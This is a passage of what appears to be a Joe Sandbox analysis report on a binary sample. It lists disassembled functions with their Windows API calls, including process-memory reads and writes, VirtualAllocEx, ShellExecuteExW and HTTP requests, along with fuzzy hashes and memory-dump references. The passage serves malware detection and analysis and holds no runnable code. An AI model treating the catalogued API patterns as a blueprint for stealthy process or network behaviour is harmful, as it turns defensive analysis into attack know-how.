                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                                                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                        • API String ID: 708495834-557222456
                                                                                        • Opcode ID: fac892481d924faf91c45d91b33e8832c0b361392b7fa4edc49b5a3d22954602
                                                                                        • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                                                                        • Opcode Fuzzy Hash: fac892481d924faf91c45d91b33e8832c0b361392b7fa4edc49b5a3d22954602
                                                                                        • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                                                                                        APIs
                                                                                          • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                                        • CoInitialize.OLE32(00000000), ref: 00478442
                                                                                        • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                                                                        • CoUninitialize.OLE32 ref: 0047863C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                        • String ID: .lnk
                                                                                        • API String ID: 886957087-24824748
                                                                                        • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                                                        • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                                                                        • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                                                        • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                                                                        APIs
                                                                                          • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                                                                          • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                                                                          • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                                                                          • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                                                                          • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                                                                        • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                        • String ID: @
                                                                                        • API String ID: 4150878124-2766056989
                                                                                        • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                                        • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                                                                        • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                                        • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove
                                                                                        • String ID: \$]$h
                                                                                        • API String ID: 4104443479-3262404753
                                                                                        • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                                        • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                                                                                        • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                                        • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                                                                                        APIs
                                                                                        • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                                                                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                        • CloseHandle.KERNEL32(?), ref: 00457E09
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                                                                        • String ID: <$@
                                                                                        • API String ID: 2417854910-1426351568
                                                                                        • Opcode ID: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                                                                        • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                                                                        • Opcode Fuzzy Hash: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                                                                        • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                                                                                        APIs
                                                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                                                                          • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                                        • String ID:
                                                                                        • API String ID: 3705125965-3916222277
                                                                                        • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                                        • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                                                                        • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                                        • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                                                                        APIs
                                                                                        • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                                                                        • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                                                                        • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Delete$InfoItem
                                                                                        • String ID: 0
                                                                                        • API String ID: 135850232-4108050209
                                                                                        • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                                        • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                                                                        • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                                        • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                                                                        APIs
                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Long
                                                                                        • String ID: SysTreeView32
                                                                                        • API String ID: 847901565-1698111956
                                                                                        • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                                        • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                                                                        • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                                        • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window
                                                                                        • String ID: SysMonthCal32
                                                                                        • API String ID: 2326795674-1439706946
                                                                                        • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                                        • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                                                                                        • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                                        • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                                                                                        APIs
                                                                                        • DestroyWindow.USER32(00000000), ref: 00450A2F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: DestroyWindow
                                                                                        • String ID: msctls_updown32
                                                                                        • API String ID: 3375834691-2298589950
                                                                                        • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                                        • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                                                                        • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                                        • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove
                                                                                        • String ID: $<
                                                                                        • API String ID: 4104443479-428540627
                                                                                        • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                                        • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                                                                                        • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                                        • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$DiskFreeSpace
                                                                                        • String ID: \VH
                                                                                        • API String ID: 1682464887-234962358
                                                                                        • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                                        • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                                                                                        • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                                        • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$DiskFreeSpace
                                                                                        • String ID: \VH
                                                                                        • API String ID: 1682464887-234962358
                                                                                        • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                                        • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                                                                        • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                                        • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$DiskFreeSpace
                                                                                        • String ID: \VH
                                                                                        • API String ID: 1682464887-234962358
                                                                                        • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                                        • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                                                                        • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                                        • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                                                                        • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$InformationVolume
                                                                                        • String ID: \VH
                                                                                        • API String ID: 2507767853-234962358
                                                                                        • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                                        • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
